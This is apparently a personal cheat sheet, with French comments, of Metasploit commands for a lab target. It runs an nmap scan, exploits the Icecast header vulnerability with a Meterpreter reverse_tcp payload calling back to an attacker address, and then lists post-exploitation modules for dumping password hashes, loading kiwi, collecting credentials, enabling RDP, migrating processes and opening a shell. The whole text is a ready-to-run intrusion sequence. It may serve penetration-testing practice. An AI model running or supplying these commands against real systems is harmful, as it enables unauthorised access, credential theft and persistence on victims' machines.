msfconsole
db_nmap -sV 10.9.0.16
hosts
services
vulns
use exploit/windows/http/icecast_header
set rhosts 10.9.0.16
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.0.15
exploit
Dans une session Meterpreter (post-exploitation) :
getuid
sysinfo
load kiwi
getprivs
upload
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
run post/windows/gather/usb_history
run post/windows/manage/migrate
run post/windows/gather/enum_applications # voir les applications qui sont installées
run post/windows/gather/enum_logged_on_users
run post/windows/gather/checkvm
run post/multi/recon/local_exploit_suggester
run post/windows/gather/hashdump
run post/windows/gather/enum_snmp
run post/windows/gather/enum_shares
run post/windows/gather/credentials/credential_collector
run post/windows/manage/enable_rdp # besoin d'être administrateur
shell